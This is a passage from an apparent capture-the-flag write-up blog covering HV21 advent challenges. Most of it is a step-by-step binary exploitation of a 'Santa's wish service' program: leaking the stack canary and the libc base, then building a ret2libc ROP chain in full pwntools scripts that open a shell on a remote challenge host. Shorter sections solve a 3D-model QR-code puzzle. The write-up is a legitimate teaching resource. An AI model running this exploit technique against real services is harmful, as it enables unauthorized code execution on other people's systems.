noopener\">https:\/\/www.sans.org\/blog\/stack-canaries-gingerly-sidestepping-the-cage\/<\/a><\/p>\n\n\n\n<p>The stack canary is written on the stack between the local variables and the saved instruction pointer (the return address). 
If a buffer overflow overwrites the instruction pointer, the stack canary is overwritten too, and the program crashes with &#8220;Stack smashing detected&#8221;, exactly as shown in the screenshot above. To circumvent this, we need to read the stack canary with the memory leak and write the same value back when we overflow the buffer. In a 64-bit ELF binary the stack canary is 8 bytes long and typically starts with 0x00. Let&#8217;s see if we can find the canary with the hexdump() function of pwntools:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\nfrom struct import pack\np = gdb.debug('.\/hv21_santas_wish_service', 'c')\n#p = process(\".\/hv21_santas_wish_service\")\nbinary = ELF('.\/hv21_santas_wish_service')\ncontext.binary = binary\nlibc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\ncontext.update(arch='amd64', os='linux')\np.clean()\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*199)\n# get canary\nmemory_dump = p.recvuntil(b' 1: Send \\xf0\\x9f\\x8e\\x85 a wish\\n')\ncanary = memory_dump[246:254]\nprint(hexdump(memory_dump))<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"537\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-61-1024x537.png\" alt=\"\" class=\"wp-image-1794\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-61-1024x537.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-61-300x157.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-61-768x403.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-61-1536x806.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-61.png 1720w\" 
sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>In this case the stack canary is directly after my input &#8220;AAA&#8230;&#8221; (&#8230; 0x41 0x41 0x0a): <strong>0x008d57aeea482121<\/strong>. Now we read this dynamically and put it back in place:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\nfrom struct import pack\np = gdb.debug('.\/hv21_santas_wish_service', 'c')\n#p = process(\".\/hv21_santas_wish_service\")\nbinary = ELF('.\/hv21_santas_wish_service')\ncontext.binary = binary\nlibc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\ncontext.update(arch='amd64', os='linux')\np.clean()\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*199)\n# get canary\nmemory_dump = p.recvuntil(b' 1: Send \\xf0\\x9f\\x8e\\x85 a wish\\n')\ncanary = memory_dump[246:254]\nprint(hexdump(memory_dump))\nprint(\"[--> Found Stack Canary: \" + str(canary.hex()))\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*200+canary+b'B'*300)\np.recvuntil(b'2: Exit')\np.recvline()\np.sendline(b'2')\np.interactive()<\/pre>\n\n\n\n<p>We can see that we can trigger the overflow and no smash detection happens anymore:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"861\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-62-1024x861.png\" alt=\"\" class=\"wp-image-1795\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-62-1024x861.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-62-300x252.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-62-768x645.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-62.png 
1428w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>The next step is about finding the right spot for the payload. With &#8220;pattern_create&#8221; and &#8220;pattern_offset&#8221; we can figure this out.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ pattern_create.rb -l 800\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\nfrom struct import pack\nimport os\ncorefile = \"core.hv21_santas_wis\"\nif os.path.exists(corefile):\n\tos.remove(corefile)\n#p = gdb.debug('.\/hv21_santas_wish_service', 'c')\np = process(\".\/hv21_santas_wish_service\")\nbinary = ELF('.\/hv21_santas_wish_service')\ncontext.binary = binary\nlibc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\ncontext.update(arch='amd64', 
os='linux')\np.clean()\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*199)\n# get canary\nmemory_dump = p.recvuntil(b' 1: Send \\xf0\\x9f\\x8e\\x85 a wish\\n')\ncanary = memory_dump[246:254]\nprint(hexdump(memory_dump))\nprint(\"[--> Found Stack Canary: \" + str(canary.hex()))\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*200+canary+b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba')\np.recvuntil(b'2: Exit')\np.recvline()\np.sendline(b'2')\np.interactive()\n#debug directly with pwntools\n#sudo bash -c 'echo core.%e > \/proc\/sys\/kernel\/core_pattern'\ncore = Coredump(corefile)\nprint(\"RIP: \" + str(hex(core.rip)))<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"463\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-63-1024x463.png\" alt=\"\" class=\"wp-image-1796\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-63-1024x463.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-63-300x136.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-63-768x347.png 768w, 
https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-63-1536x695.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-63.png 1658w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>We now know the offset, which is 8!<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Step 2 &#8211; Find libc base-address<\/h3>\n\n\n\n<p>Before actually doing step 2, I tried to disable ASLR locally and generate a payload to get a local shell. This didn&#8217;t work because of the PIE protection. PIE randomizes the application&#8217;s internal memory addresses, and therefore the ROP gadgets which I found with ropper don&#8217;t work. After some time I found out that circumventing PIE is not necessary at all. With the memory leak we can directly leak the libc base address of the system and build a ROP chain directly from libc. Combining all this, we are able to generate our final payload.<\/p>\n\n\n\n<p>At the offset +8, which we determined before, we find the return address of the main function of the provided ELF binary. This return address points back into libc, and therefore we can leak the libc base address of the running system!<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/refspecs.linuxbase.org\/LSB_3.1.0\/LSB-Core-generic\/LSB-Core-generic\/baselib---libc-start-main-.html\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/refspecs.linuxbase.org\/LSB_3.1.0\/LSB-Core-generic\/LSB-Core-generic\/baselib---libc-start-main-.html<\/a><\/li>\n<\/ul>\n\n\n\n<p>We disassemble the __libc_start_main function and find the right offset at +243. 
<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"847\" height=\"1024\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-64-847x1024.png\" alt=\"\" class=\"wp-image-1797\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-64-847x1024.png 847w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-64-248x300.png 248w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-64-768x928.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-64-1271x1536.png 1271w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-64.png 1526w\" sizes=\"auto, (max-width: 847px) 100vw, 847px\" \/><\/figure>\n\n\n\n<p>Note, that the correct libc address always ends with 0x00. I modified the Python script to calculate the libc base address:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\nfrom struct import pack\np = process(\".\/hv21_santas_wish_service\")\nbinary = ELF('.\/hv21_santas_wish_service')\ncontext.binary = binary\nlibc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\ncontext.update(arch='amd64', os='linux')\np.clean()\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*199)\n# get canary\nmemory_dump = p.recvuntil(b' 1: Send \\xf0\\x9f\\x8e\\x85 a wish\\n')\ncanary = memory_dump[246:254]\n#get libc address (+8bytes after canary)\nlibc_memory_leak = memory_dump[262:270]\nlibc_base_int = int.from_bytes(libc_memory_leak, byteorder=\"little\")\nlibc_base_int = libc_base_int - 243 - libc.sym[\"__libc_start_main\"]\nprint(hexdump(memory_dump))\nprint(\"[--> Found Stack Canary: \" + str(canary.hex()))\nprint(\"[--> Found Libc Memory Leak: \" + str(hex(libc_base_int)))<\/pre>\n\n\n\n<figure 
class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"699\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-65-1024x699.png\" alt=\"\" class=\"wp-image-1798\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-65-1024x699.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-65-300x205.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-65-768x524.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-65.png 1394w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>The libc base address was found at 0x799eff7a000. <\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Step 3 &#8211; Create ROP chain<\/h3>\n\n\n\n<p>Main tutorial used: <a href=\"https:\/\/stacklikemind.io\/ret2libc-aslr\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/stacklikemind.io\/ret2libc-aslr<\/a><\/p>\n\n\n\n<p>As we already have a way to calculate the libc base address, we can search for ROP gadgets directly in libc. Take care to use the correct libc library, depending on whether you are running the exploit against the remote or the local target! 
<\/p>\n\n\n\n<p>Our final payload must look like this:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">junk \"A\" * 200 | canary | junk \"B\" * 8 | pop rdi ret gadget | ptr to \"\/bin\/bash\" | ptr to system <\/pre>\n\n\n\n<p>We use ropper to find a suitable gadget:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"237\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-66-1024x237.png\" alt=\"\" class=\"wp-image-1799\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-66-1024x237.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-66-300x70.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-66-768x178.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-66.png 1070w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>&#8220;pop rdi; ret&#8221; is just perfect &#8211; we use this one. As the address found in ropper is just an offset, we of course have to add the libc base address to it. The pointer to \/bin\/bash and the system can be easily created with pwntools:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">rop.raw(0x0000000000026b72+libc_base_int) # pop_rdi address\nrop.raw(next(libc.search(b'\/bin\/sh'))) # target libc\nrop.raw(libc.symbols['system'])<\/pre>\n\n\n\n<p>Technically, now we should have everything to finalize our exploit. Unfortunately, the exploit didn&#8217;t spawn a shell on the remote system yet. 
GDB showed me the error message &#8220;148 ..\/sysdeps\/posix\/system.c: No such file or directory.&#8221;. After reading further in the mentioned blog post I learned that this happens in an Ubuntu environment. I needed to add 8 more bytes for stack alignment. Therefore, the final payload looks like this: <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">junk \"A\" * 200 | canary | junk \"B\" * 8 | pop rdi ret gadget | ptr to \"\/bin\/bash\" | 8 bytes stackalignment | ptr to system <\/pre>\n\n\n\n<p>With this change, the exploit works perfectly! I also used the ROP() function of pwntools, which makes the whole process a little bit easier. Here is the final exploit code:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#!\/usr\/bin\/python3\n#\n# Help-files:\n# https:\/\/www.sans.org\/blog\/stack-canaries-gingerly-sidestepping-the-cage\/\n# https:\/\/stacklikemind.io\/ret2libc-aslr --> UBUNTU PART!!\n# https:\/\/mdanilor.github.io\/posts\/memory-protections\/\n#\nfrom pwn import *\nfrom struct import pack\n#p = gdb.debug('.\/hv21_santas_wish_service', 'c')\n#p = process(\".\/hv21_santas_wish_service\")\np = remote(\"152.96.7.2\", 1337)\nbinary = ELF('.\/hv21_santas_wish_service')\ncontext.binary = binary\nrop = ROP(binary)\nlibc = ELF('.\/libc.so.6')\n#libc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\ncontext.update(arch='amd64', os='linux')\np.clean()\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\np.sendline(b'A'*199)\n# get canary &amp; libc_base address\nmemory_dump = p.recvuntil(b' 1: Send \\xf0\\x9f\\x8e\\x85 a wish\\n')\ncanary 
= memory_dump[246:254]\nlibc_memory_leak = memory_dump[262:270]\nlibc_base_int = int.from_bytes(libc_memory_leak, byteorder=\"little\")\nlibc_base_int -= 0x270b3\nprint(hexdump(memory_dump))\nprint(\"[--> Found Stack Canary: \" + str(canary.hex()))\nprint(\"[--> Found Libc Memory Leak: \" + str(hex(libc_base_int)))\np.sendline(b'1')\nprint(p.recvline())\np.sendline(b'300')\nprint(p.recvline())\nlibc.address = libc_base_int\nrop.raw(b'A'*200)\nrop.raw(canary)\nrop.raw(b'B'*8)\nrop.raw(0x0000000000026b72+libc_base_int) # pop_rdi address\nrop.raw(next(libc.search(b'\/bin\/sh'))) # target libc\nrop.raw(0x00000000000c0533+libc_base_int) # stackalignment\nrop.raw(libc.symbols['system'])\np.sendline(rop.chain())\np.recvuntil(b'2: Exit')\np.recvline()\np.sendline(b'2')\np.interactive()\n<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"893\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-67-1024x893.png\" alt=\"\" class=\"wp-image-1800\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-67-1024x893.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-67-300x262.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-67-768x670.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-67.png 1516w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{0h_n0!!!_3lv3s_Pr0gr4mmingSk1llz_4r3_st1ll_b4d!}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.15] Christmas Bauble<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"824\" height=\"120\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-28.png\" alt=\"\" class=\"wp-image-1729\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-28.png 824w, 
https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-28-300x44.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-28-768x112.png 768w\" sizes=\"auto, (max-width: 824px) 100vw, 824px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>Dr Nick<\/em>.&nbsp;<em>DrSchottky<\/em>&nbsp;graciously provided the surroundings. Such great artists!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The elves have started taking 3D modeling classes and have presented Santa with&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/bauble.stl\" target=\"_blank\" rel=\"noreferrer noopener\">a gift<\/a>. What a nice gesture! But the ball feels heavier than it should; what does that even mean for digital assets???<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>There may or may not be a flag hidden somewhere. Who am I kidding, of course there is. Find it!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>This challenge was pretty easy in comparison to the binary exploitation on the day before. I used the online tool <a rel=\"noreferrer noopener\" href=\"https:\/\/app.vectary.com\/\" target=\"_blank\">https:\/\/app.vectary.com\/<\/a> to solve this challenge. I opened the file and changed the display method to wired. 
This way you can verify that there is a QR code inside the bauble, which unfortunately is not readable yet:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"859\" height=\"1024\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step1-859x1024.png\" alt=\"\" class=\"wp-image-1805\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step1-859x1024.png 859w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step1-252x300.png 252w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step1-768x916.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step1.png 1236w\" sizes=\"auto, (max-width: 859px) 100vw, 859px\" \/><\/figure>\n\n\n\n<p>I changed the display method to &#8220;shaded&#8221;, right-clicked on the bauble and selected &#8220;break apart&#8221;. In the menu on the left side I selected the different parts of the bauble until I found the outer part, which I hid in the view. Now a pretty clear QR code is already visible, although it is still not scannable.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"468\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step2-1024x468.png\" alt=\"\" class=\"wp-image-1806\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step2-1024x468.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step2-300x137.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step2-768x351.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step2-1536x702.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/Step2-2048x936.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>As a final step I changed the color to all black and got 3 different QR codes from the different orientations:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" 
width=\"720\" height=\"560\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part1.png\" alt=\"\" class=\"wp-image-1807\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part1.png 720w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part1-300x233.png 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"708\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part2.png\" alt=\"\" class=\"wp-image-1808\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part2.png 900w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part2-300x236.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part2-768x604.png 768w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"690\" height=\"576\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part3.png\" alt=\"\" class=\"wp-image-1809\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part3.png 690w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag_part3-300x250.png 300w\" sizes=\"auto, (max-width: 690px) 100vw, 690px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{1st_P4rt_0f_th3_fl4g_with_the_2nd_P4rt_c0mb1ned_w17h_th4t}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21-Hidden] Where did you find that??<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"816\" height=\"110\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-29.png\" alt=\"\" class=\"wp-image-1730\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-29.png 816w, 
https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-29-300x40.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-29-768x104.png 768w\" sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/figure>\n\n\n\n<p>What? You found another one? Lucky you!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>In the wired view of the same online application as before I found the flag hidden in the top left corner of one of the QR codes. <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"488\" height=\"354\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/hidden.png\" alt=\"\" class=\"wp-image-1810\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/hidden.png 488w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/hidden-300x218.png 300w\" sizes=\"auto, (max-width: 488px) 100vw, 488px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{hidd3n_1n_th3_cube}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.16] Santa&#8217;s Crypto Vault<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"820\" height=\"114\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-30.png\" alt=\"\" class=\"wp-image-1731\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-30.png 820w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-30-300x42.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-30-768x107.png 768w\" sizes=\"auto, (max-width: 820px) 100vw, 820px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>MtHonegg<\/em>.&nbsp;<em>Kotlin<\/em>&nbsp;rulez \ud83d\ude09<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>With the recent Crypto Rally, Santa has invested all his funds into Santa 
